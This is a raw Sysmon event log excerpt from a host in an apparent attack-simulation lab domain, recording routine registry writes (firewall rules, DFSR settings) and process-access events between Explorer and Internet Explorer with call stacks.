13241300x800000000000000013731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523S-1-5-18v2.26|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|LUOwn=S-1-5-18|M=microsoft.windows.fontdrvhost|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host| 13241300x800000000000000013730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005de) 13241300x800000000000000013729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FF9DDC57-1E79-4544-A1DC-B016708E7487}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 13241300x800000000000000013728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005dd) 13241300x800000000000000013727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:59:29.553{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B53BAE1E-A0CD-4D4F-82C8-4C4E5F868D0A}v2.26|Action=Block|Active=TRUE|Dir=In|Name=Usermode Font Driver Host|Desc=Usermode Font Driver Host|LUOwn=S-1-5-18|AppPkgId=S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523|EmbedCtxt=Usermode Font Driver Host| 10341000x800000000000000013726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.537{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.459{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.959{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.943{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.943{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.928{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 
13241300x800000000000000013771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000013770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000013769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x800000000000000013768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 